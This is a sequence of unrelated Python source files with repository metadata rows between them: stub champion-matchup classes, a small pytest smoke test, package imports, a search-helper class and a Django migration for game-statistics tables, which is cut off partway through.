class NA_Varus_Bot_Taric(Ratings):
    pass
class NA_Varus_Bot_Teemo(Ratings):
    pass
class NA_Varus_Bot_Thresh(Ratings):
    pass
class NA_Varus_Bot_Tristana(Ratings):
    pass
class NA_Varus_Bot_Trundle(Ratings):
    pass
class NA_Varus_Bot_Tryndamere(Ratings):
    pass
class NA_Varus_Bot_TwistedFate(Ratings):
    pass
class NA_Varus_Bot_Twitch(Ratings):
    pass
class NA_Varus_Bot_Udyr(Ratings):
    pass
class NA_Varus_Bot_Urgot(Ratings):
    pass
class NA_Varus_Bot_Varus(Ratings):
    pass
class NA_Varus_Bot_Vayne(Ratings):
    pass
class NA_Varus_Bot_Veigar(Ratings):
    pass
class NA_Varus_Bot_Velkoz(Ratings):
    pass
class NA_Varus_Bot_Vi(Ratings):
    pass
class NA_Varus_Bot_Viktor(Ratings):
    pass
class NA_Varus_Bot_Vladimir(Ratings):
    pass
class NA_Varus_Bot_Volibear(Ratings):
    pass
class NA_Varus_Bot_Warwick(Ratings):
    pass
class NA_Varus_Bot_Xayah(Ratings):
    pass
class NA_Varus_Bot_Xerath(Ratings):
    pass
class NA_Varus_Bot_XinZhao(Ratings):
    pass
class NA_Varus_Bot_Yasuo(Ratings):
    pass
class NA_Varus_Bot_Yorick(Ratings):
    pass
class NA_Varus_Bot_Zac(Ratings):
    pass
class NA_Varus_Bot_Zed(Ratings):
    pass
class NA_Varus_Bot_Ziggs(Ratings):
    pass
class NA_Varus_Bot_Zilean(Ratings):
    pass
class NA_Varus_Bot_Zyra(Ratings):
    pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
f4f49bb66cccb8ef0abf49aa6aedaf8c745113d4
| 126
|
py
|
Python
|
test_docker_mirror.py
|
chldong/docker_mirror
|
f7b9f87a3bb5caf1394a7ceddbaaef38676f99fa
|
[
"MIT"
] | 376
|
2017-10-23T03:34:16.000Z
|
2022-03-31T01:24:39.000Z
|
test_docker_mirror.py
|
chldong/docker_mirror
|
f7b9f87a3bb5caf1394a7ceddbaaef38676f99fa
|
[
"MIT"
] | 17
|
2018-04-04T14:32:47.000Z
|
2020-09-14T13:40:56.000Z
|
test_docker_mirror.py
|
chldong/docker_mirror
|
f7b9f87a3bb5caf1394a7ceddbaaef38676f99fa
|
[
"MIT"
] | 115
|
2017-11-06T07:18:49.000Z
|
2022-03-08T00:55:53.000Z
|
import pytest
from docker_mirror import execute_sys_cmd
def test_execute_sys_cmd():
    """Smoke test: running a trivially available command must succeed."""
    # "date" is expected to exist on the test host; exit status 0 means success.
    exit_code = execute_sys_cmd("date")
    assert exit_code == 0
| 18
| 41
| 0.785714
| 20
| 126
| 4.55
| 0.65
| 0.32967
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.142857
| 126
| 6
| 42
| 21
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f4f6b0641272f491779dbcf9b284526130134303
| 120
|
py
|
Python
|
test_project/testapp/tests/__init__.py
|
kmike/tornado-slacker
|
3f11ad29777fa24bde6bf42b66c37beca97eafc5
|
[
"MIT"
] | 8
|
2015-01-14T22:34:23.000Z
|
2016-02-11T19:49:35.000Z
|
test_project/testapp/tests/__init__.py
|
kmike/tornado-slacker
|
3f11ad29777fa24bde6bf42b66c37beca97eafc5
|
[
"MIT"
] | null | null | null |
test_project/testapp/tests/__init__.py
|
kmike/tornado-slacker
|
3f11ad29777fa24bde6bf42b66c37beca97eafc5
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from slacker.tests import *
from .django_tests import *
from .workers import *
| 17.142857
| 38
| 0.8
| 16
| 120
| 5.625
| 0.5
| 0.333333
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 120
| 6
| 39
| 20
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
760f5c2a868751c7cd78e96280727996cdd3cb93
| 318
|
py
|
Python
|
Search/Helper/SearchHelper.py
|
jbzdarkid/TwitchLink
|
c7bae13b46c7e6af7dc74539fdbca9cbb01f4778
|
[
"MIT"
] | 26
|
2021-02-04T00:29:21.000Z
|
2022-03-25T17:14:43.000Z
|
Search/Helper/SearchHelper.py
|
jbzdarkid/TwitchLink
|
c7bae13b46c7e6af7dc74539fdbca9cbb01f4778
|
[
"MIT"
] | 19
|
2021-02-04T01:27:07.000Z
|
2022-03-19T16:22:46.000Z
|
Search/Helper/SearchHelper.py
|
jbzdarkid/TwitchLink
|
c7bae13b46c7e6af7dc74539fdbca9cbb01f4778
|
[
"MIT"
] | 10
|
2021-06-08T17:41:40.000Z
|
2022-03-28T22:38:40.000Z
|
from .Config import Config
class SearchHelper:
    """Static convenience accessors for the example values stored on Config."""

    @staticmethod
    def getChannelIdExamples():
        """Return Config.CHANNEL_ID_EXAMPLES unchanged."""
        return Config.CHANNEL_ID_EXAMPLES

    @staticmethod
    def getVideoClipIdExamples():
        """Return Config.VIDEO_CLIP_ID_EXAMPLES unchanged."""
        return Config.VIDEO_CLIP_ID_EXAMPLES

    @staticmethod
    def getUrlExamples():
        """Return Config.URL_EXAMPLES unchanged."""
        return Config.URL_EXAMPLES
| 21.2
| 44
| 0.720126
| 30
| 318
| 7.433333
| 0.566667
| 0.201794
| 0.197309
| 0.224215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.226415
| 318
| 15
| 45
| 21.2
| 0.906504
| 0
| 0
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| true
| 0
| 0.090909
| 0.272727
| 0.727273
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5207449f6afa34e03b15ea6eca2dd4e55c06e987
| 234
|
py
|
Python
|
models/__init__.py
|
lim0606/pytorch-ardae-rl
|
6e861d8f09ee27fa8f7b42d1eb209788c93395fa
|
[
"MIT"
] | 7
|
2020-09-13T20:36:24.000Z
|
2022-03-31T09:30:36.000Z
|
models/__init__.py
|
lim0606/pytorch-ardae-rl
|
6e861d8f09ee27fa8f7b42d1eb209788c93395fa
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
lim0606/pytorch-ardae-rl
|
6e861d8f09ee27fa8f7b42d1eb209788c93395fa
|
[
"MIT"
] | null | null | null |
# dae
from models.graddae.mlp import DAE as MLPGradDAE
from models.graddae.mlp import ARDAE as MLPGradARDAE
from models.graddae.mlp import ConditionalDAE as MLPGradCDAE
from models.graddae.mlp import ConditionalARDAE as MLPGradCARDAE
| 39
| 64
| 0.850427
| 33
| 234
| 6.030303
| 0.424242
| 0.201005
| 0.341709
| 0.40201
| 0.522613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 234
| 5
| 65
| 46.8
| 0.956731
| 0.012821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5216f13a99bf077608c3c9f1ddcadbb330d03955
| 33,109
|
py
|
Python
|
backend/gamestatistics/migrations/0001_initial.py
|
b3none/Tensor
|
6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba
|
[
"MIT"
] | null | null | null |
backend/gamestatistics/migrations/0001_initial.py
|
b3none/Tensor
|
6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba
|
[
"MIT"
] | null | null | null |
backend/gamestatistics/migrations/0001_initial.py
|
b3none/Tensor
|
6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba
|
[
"MIT"
] | 3
|
2021-09-06T18:01:52.000Z
|
2021-10-18T02:49:53.000Z
|
# Generated by Django 3.0.5 on 2021-07-09 17:16
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration for the gamestatistics app.

    Declares Django model stubs over pre-existing game-server tables
    (SurfTimer ``ck_*`` tables and a RankMe ``rankme`` table).  Every model
    is ``managed = False``, so this migration creates NO tables — it only
    registers the models with Django's migration state so the ORM can read
    the externally managed schema.
    """

    initial = True

    # No dependencies: this is the app's first migration.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='CkAnnouncements',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('server', models.CharField(max_length=256)),
                ('name', models.CharField(max_length=32)),
                ('mapname', models.CharField(max_length=128)),
                ('mode', models.IntegerField()),
                ('time', models.CharField(max_length=32)),
                ('group', models.IntegerField()),
                ('style', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_announcements',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkBonus',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('mapname', models.CharField(max_length=32)),
                ('runtime', models.FloatField()),
                ('zonegroup', models.IntegerField()),
                ('style', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_bonus',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkCheckpoints',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('mapname', models.CharField(max_length=32)),
                # cp1..cp35: per-checkpoint times; nullable because a run may
                # not have reached every checkpoint.
                ('cp1', models.FloatField(blank=True, null=True)),
                ('cp2', models.FloatField(blank=True, null=True)),
                ('cp3', models.FloatField(blank=True, null=True)),
                ('cp4', models.FloatField(blank=True, null=True)),
                ('cp5', models.FloatField(blank=True, null=True)),
                ('cp6', models.FloatField(blank=True, null=True)),
                ('cp7', models.FloatField(blank=True, null=True)),
                ('cp8', models.FloatField(blank=True, null=True)),
                ('cp9', models.FloatField(blank=True, null=True)),
                ('cp10', models.FloatField(blank=True, null=True)),
                ('cp11', models.FloatField(blank=True, null=True)),
                ('cp12', models.FloatField(blank=True, null=True)),
                ('cp13', models.FloatField(blank=True, null=True)),
                ('cp14', models.FloatField(blank=True, null=True)),
                ('cp15', models.FloatField(blank=True, null=True)),
                ('cp16', models.FloatField(blank=True, null=True)),
                ('cp17', models.FloatField(blank=True, null=True)),
                ('cp18', models.FloatField(blank=True, null=True)),
                ('cp19', models.FloatField(blank=True, null=True)),
                ('cp20', models.FloatField(blank=True, null=True)),
                ('cp21', models.FloatField(blank=True, null=True)),
                ('cp22', models.FloatField(blank=True, null=True)),
                ('cp23', models.FloatField(blank=True, null=True)),
                ('cp24', models.FloatField(blank=True, null=True)),
                ('cp25', models.FloatField(blank=True, null=True)),
                ('cp26', models.FloatField(blank=True, null=True)),
                ('cp27', models.FloatField(blank=True, null=True)),
                ('cp28', models.FloatField(blank=True, null=True)),
                ('cp29', models.FloatField(blank=True, null=True)),
                ('cp30', models.FloatField(blank=True, null=True)),
                ('cp31', models.FloatField(blank=True, null=True)),
                ('cp32', models.FloatField(blank=True, null=True)),
                ('cp33', models.FloatField(blank=True, null=True)),
                ('cp34', models.FloatField(blank=True, null=True)),
                ('cp35', models.FloatField(blank=True, null=True)),
                ('zonegroup', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_checkpoints',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkLatestrecords',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('runtime', models.FloatField()),
                ('map', models.CharField(max_length=32)),
                ('date', models.DateTimeField()),
            ],
            options={
                'db_table': 'ck_latestrecords',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkMaptier',
            fields=[
                ('mapname', models.CharField(max_length=54, primary_key=True, serialize=False)),
                ('tier', models.IntegerField()),
                ('maxvelocity', models.FloatField()),
                ('announcerecord', models.IntegerField()),
                ('gravityfix', models.IntegerField()),
                ('ranked', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_maptier',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkNewmaps',
            fields=[
                ('mapname', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('date', models.DateTimeField()),
            ],
            options={
                'db_table': 'ck_newmaps',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkPlayeroptions2',
            fields=[
                # Per-player UI/behavior toggles; presumably 0/1 flags stored
                # as integers by the game plugin — verify against the plugin.
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('timer', models.IntegerField()),
                ('hide', models.IntegerField()),
                ('sounds', models.IntegerField()),
                ('chat', models.IntegerField()),
                ('viewmodel', models.IntegerField()),
                ('autobhop', models.IntegerField()),
                ('checkpoints', models.IntegerField()),
                ('gradient', models.IntegerField()),
                ('speedmode', models.IntegerField()),
                ('centrespeed', models.IntegerField()),
                ('centrehud', models.IntegerField()),
                ('teleside', models.IntegerField()),
                ('module1c', models.IntegerField()),
                ('module2c', models.IntegerField()),
                ('module3c', models.IntegerField()),
                ('module4c', models.IntegerField()),
                ('module5c', models.IntegerField()),
                ('module6c', models.IntegerField()),
                ('sidehud', models.IntegerField()),
                ('module1s', models.IntegerField()),
                ('module2s', models.IntegerField()),
                ('module3s', models.IntegerField()),
                ('module4s', models.IntegerField()),
                ('module5s', models.IntegerField()),
                ('prestrafe', models.IntegerField()),
                ('cpmessages', models.IntegerField()),
                ('wrcpmessages', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_playeroptions2',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkPlayerrank',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('steamid64', models.CharField(blank=True, max_length=64, null=True)),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('country', models.CharField(blank=True, max_length=32, null=True)),
                ('points', models.IntegerField(blank=True, null=True)),
                ('wrpoints', models.IntegerField()),
                ('wrbpoints', models.IntegerField()),
                ('wrcppoints', models.IntegerField()),
                ('top10points', models.IntegerField()),
                ('groupspoints', models.IntegerField()),
                ('mappoints', models.IntegerField()),
                ('bonuspoints', models.IntegerField()),
                ('finishedmaps', models.IntegerField(blank=True, null=True)),
                ('finishedmapspro', models.IntegerField(blank=True, null=True)),
                ('finishedbonuses', models.IntegerField()),
                ('finishedstages', models.IntegerField()),
                ('wrs', models.IntegerField()),
                ('wrbs', models.IntegerField()),
                ('wrcps', models.IntegerField()),
                ('top10s', models.IntegerField()),
                ('groups', models.IntegerField()),
                ('lastseen', models.IntegerField(blank=True, null=True)),
                ('joined', models.IntegerField()),
                ('timealive', models.IntegerField()),
                ('timespec', models.IntegerField()),
                ('connections', models.IntegerField()),
                ('readchangelog', models.IntegerField()),
                ('style', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_playerrank',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkPlayertemp',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('mapname', models.CharField(max_length=32)),
                ('cords1', models.FloatField()),
                ('cords2', models.FloatField()),
                ('cords3', models.FloatField()),
                ('angle1', models.FloatField()),
                ('angle2', models.FloatField()),
                ('angle3', models.FloatField()),
                # db_column preserves the legacy mixed-case column names.
                ('enctickrate', models.IntegerField(blank=True, db_column='EncTickrate', null=True)),
                ('runtimetmp', models.FloatField(db_column='runtimeTmp')),
                ('stage', models.IntegerField(blank=True, db_column='Stage', null=True)),
                ('zonegroup', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_playertemp',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkPlayertimes',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('mapname', models.CharField(max_length=32)),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('runtimepro', models.FloatField()),
                ('style', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_playertimes',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkSpawnlocations',
            fields=[
                ('mapname', models.CharField(max_length=54, primary_key=True, serialize=False)),
                ('pos_x', models.FloatField()),
                ('pos_y', models.FloatField()),
                ('pos_z', models.FloatField()),
                ('ang_x', models.FloatField()),
                ('ang_y', models.FloatField()),
                ('ang_z', models.FloatField()),
                ('vel_x', models.FloatField()),
                ('vel_y', models.FloatField()),
                ('vel_z', models.FloatField()),
                ('zonegroup', models.IntegerField()),
                ('stage', models.IntegerField()),
                ('teleside', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_spawnlocations',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkVipadmins',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('title', models.CharField(blank=True, max_length=128, null=True)),
                ('namecolour', models.IntegerField(blank=True, null=True)),
                ('textcolour', models.IntegerField()),
                ('joinmsg', models.CharField(blank=True, max_length=255, null=True)),
                ('pbsound', models.CharField(max_length=256)),
                ('topsound', models.CharField(max_length=256)),
                ('wrsound', models.CharField(max_length=256)),
                ('inuse', models.IntegerField(blank=True, null=True)),
                ('vip', models.IntegerField(blank=True, null=True)),
                ('admin', models.IntegerField()),
                ('zoner', models.IntegerField()),
                ('active', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_vipadmins',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkWrcps',
            fields=[
                ('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('mapname', models.CharField(max_length=32)),
                ('runtimepro', models.FloatField()),
                ('stage', models.IntegerField()),
                ('style', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_wrcps',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='CkZones',
            fields=[
                ('mapname', models.CharField(max_length=54, primary_key=True, serialize=False)),
                ('zoneid', models.IntegerField()),
                ('zonetype', models.IntegerField(blank=True, null=True)),
                ('zonetypeid', models.IntegerField(blank=True, null=True)),
                # pointa/pointb: the two opposite corners of a zone volume.
                ('pointa_x', models.FloatField(blank=True, null=True)),
                ('pointa_y', models.FloatField(blank=True, null=True)),
                ('pointa_z', models.FloatField(blank=True, null=True)),
                ('pointb_x', models.FloatField(blank=True, null=True)),
                ('pointb_y', models.FloatField(blank=True, null=True)),
                ('pointb_z', models.FloatField(blank=True, null=True)),
                ('vis', models.IntegerField(blank=True, null=True)),
                ('team', models.IntegerField(blank=True, null=True)),
                ('zonegroup', models.IntegerField()),
                ('zonename', models.CharField(blank=True, max_length=128, null=True)),
                ('hookname', models.CharField(blank=True, max_length=128, null=True)),
                ('targetname', models.CharField(blank=True, max_length=128, null=True)),
                ('onejumplimit', models.IntegerField()),
                ('prespeed', models.IntegerField()),
            ],
            options={
                'db_table': 'ck_zones',
                'managed': False,
            },
        ),
        # NOTE(review): Rank_awp and Rank_retake below declare identical field
        # sets and BOTH map to db_table 'rankme' — presumably they are routed
        # to different databases (awp vs retake servers); verify against the
        # project's DATABASE_ROUTERS before assuming they share one table.
        migrations.CreateModel(
            name='Rank_awp',
            fields=[
                ('steam', models.CharField(blank=True, max_length=40, primary_key=True, serialize=False, unique=True)),
                ('name', models.TextField(blank=True, null=True)),
                ('lastip', models.TextField(blank=True, null=True)),
                ('score', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('kills', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('deaths', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('assists', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('suicides', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('tk', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('shots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hits', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('headshots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('connected', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('rounds_tr', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('rounds_ct', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('lastconnect', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('knife', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('glock', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hkp2000', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('usp_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('p250', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('deagle', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('elite', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('fiveseven', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('tec9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('cz75a', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('revolver', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('nova', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('xm1014', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mag7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('sawedoff', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('bizon', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mac10', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mp9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mp7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ump45', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('p90', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('galilar', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ak47', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('scar20', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('famas', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('m4a1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('m4a1_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('aug', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ssg08', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('sg556', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('awp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('g3sg1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('m249', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('negev', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('flashbang', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('smokegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('inferno', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('decoy', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('taser', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mp5sd', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('breachcharge', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('head', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('chest', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('stomach', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('left_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('right_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('left_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('right_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('c4_planted', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('c4_exploded', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('c4_defused', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('ct_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('tr_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hostages_rescued', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('vip_killed', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('vip_escaped', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('vip_played', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('mvp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('damage', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('match_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('match_draw', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('match_lose', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('first_blood', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('no_scope', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('no_scope_dis', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
            ],
            options={
                'db_table': 'rankme',
                'abstract': False,
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='Rank_retake',
            fields=[
                ('steam', models.CharField(blank=True, max_length=40, primary_key=True, serialize=False, unique=True)),
                ('name', models.TextField(blank=True, null=True)),
                ('lastip', models.TextField(blank=True, null=True)),
                ('score', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('kills', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('deaths', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('assists', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('suicides', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('tk', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('shots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hits', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('headshots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('connected', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('rounds_tr', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('rounds_ct', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('lastconnect', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('knife', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('glock', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('hkp2000', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('usp_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('p250', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('deagle', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
                ('elite', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
